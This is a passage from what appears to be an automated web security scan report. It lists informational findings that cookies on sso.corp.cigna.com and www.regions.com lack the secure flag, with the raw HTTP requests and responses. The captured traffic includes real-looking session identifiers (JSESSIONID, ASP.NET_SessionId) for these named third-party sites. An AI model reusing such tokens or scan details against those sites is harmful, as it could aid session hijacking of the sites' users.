The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/header_forgot_password.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=74B632B07FD1107FC7D4A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:42 GMT
Content-length: 1858
Content-type: image/gif
Set-Cookie: TLTHID=76094A447FD1107FC7EAA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "50bef55a-8-0-742"
Last-modified: Sat, 10 Jan 2004 21:45:32 GMT
Accept-ranges: bytes

GIF89a..........k..7............q.............y...........Y..t..D..#y...............................................................................i.....D......n....c..........................Q......
...[SNIP]...

5.71. https://sso.corp.cigna.com/corp/sso/images/pshim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/pshim.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/pshim.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "4c740010-1-0-327"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7FF807FD9107F0898A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.72. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/truesecure.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/truesecure.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "8bbd1376-1-0-c0f"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA13387FD9107F089AA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.73. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/yahoo_logo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/yahoo_logo.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "c45c439f-1-0-65"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA49AC7FD9107F089EA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.74. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "4ceaf758-1-0-a3d"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=4D8EA84A7FD9107F04F9A536181C0CE6; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:27:33 GMT
Set-Cookie: TLTHID=67A13BF87FD9107F05A8A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.75. https://sso.corp.cigna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: TLTHID=78D4C8B67FD1107FC7FFA536181C0CE6; Path=/; Domain=.cigna.com

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...

5.76. https://www.regions.com/App_Themes/2010/Ems.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/Ems.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/Ems.css HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: text/css
Last-Modified: Wed, 09 Mar 2011 20:07:58 GMT
Accept-Ranges: bytes
ETag: "02323af95decb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT
Content-Length: 21952

.../*****************************/
/* Web Channel Services: Base
/*****************************/
.foo{}

/*****************************/
/* HTML General
/*****************************/
body, h
...[SNIP]...

5.77. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticBackgrounds.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/img/staticBackgrounds.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/App_Themes/2010/Ems.css
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 799
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

GIF89a.....`............................................................................................................................................................................................
...[SNIP]...

5.78. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticFlyouts.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/staticFlyouts.png HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 9597
Content-Type: image/png
Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT
Accept-Ranges: bytes
ETag: "08cb2645f3cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:21 GMT

.PNG
.
...IHDR...~.........D.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..%.IDATx...].\.y......T.....,Y.E.vC.R...U/
.J.........a..r...[.I."M.."n.....F.....6.j..b..
T\....a....-.
..,...
...[SNIP]...

5.79. https://www.regions.com/App_Themes/2010/img/staticImages.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticImages.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/img/staticImages.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/App_Themes/2010/Ems.css
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 9783
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:06 GMT

GIF89a..^.......Y....T...z........b........d.9..q.g.i.....r........q.....]...Q..........Kk...........y..[....V........^.2yyyN.........h............>T...........m..........f9[....|.Yf.....g.....s.Ov...
...[SNIP]...

5.80. https://www.regions.com/Img/sm_558800_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Img/sm_558800_oo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Img/sm_558800_oo.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 597
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:00 GMT

GIF89a    .    ....fff...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

5.81. https://www.regions.com/JS/cmbd-jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /JS/cmbd-jquery.min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/cmbd-jquery.min.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 73452
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 18:41:00 GMT
Accept-Ranges: bytes
ETag: "04635a7a5cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT

...//*********** jquery-1.4.2.min.js *******
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.aj
...[SNIP]...

5.82. https://www.regions.com/JS/loadMedia.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /JS/loadMedia.min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/loadMedia.min.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT
Accept-Ranges: bytes
ETag: "039b9c4bef3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT
Content-Length: 35261

...var agt=navigator.userAgent.toLowerCase();var is_major=parseInt(navigator.appVersion);var is_minor=parseFloat(navigator.appVersion);var is_nav=((agt.indexOf("mozilla")!=-1)&&(agt.indexOf("spoofer")
...[SNIP]...

5.83. https://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "01e6fd51a1cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:06 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

5.84. https://www.regions.com/js/_bt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/_bt.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/_bt.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT
Accept-Ranges: bytes
ETag: "0b994a976fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:00 GMT
Content-Length: 990

//if bt_test is true before executing this script the iframe will load on uat
//
//if bt_extra is declared as an associative array before executing this script all members of the array will be added
...[SNIP]...

5.85. https://www.regions.com/js/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/wtbase.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/wtbase.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT
Accept-Ranges: bytes
ETag: "0ff57cd76fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:02 GMT
Content-Length: 13718

function DcsInit(){
   this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i";
   this.domain="statse.webtrendslive.com";
   this.enabled=true;
   this.exre=(function(){
       if (window.RegExp){
           return(new RegExp(
...[SNIP]...

5.86. https://www.regions.com/virtualMedia/img2612.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2612.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2612.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 38403
Content-Type: image/jpeg
Last-Modified: Tue, 10 May 2011 16:53:30 GMT
Accept-Ranges: bytes
ETag: "e030abca32fcc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:24 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

5.87. https://www.regions.com/virtualMedia/img3090.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3090.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3090.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 6969
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 18:47:12 GMT
Accept-Ranges: bytes
ETag: "b0509dafd45cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...

5.88. https://www.regions.com/virtualMedia/img3094.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3094.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

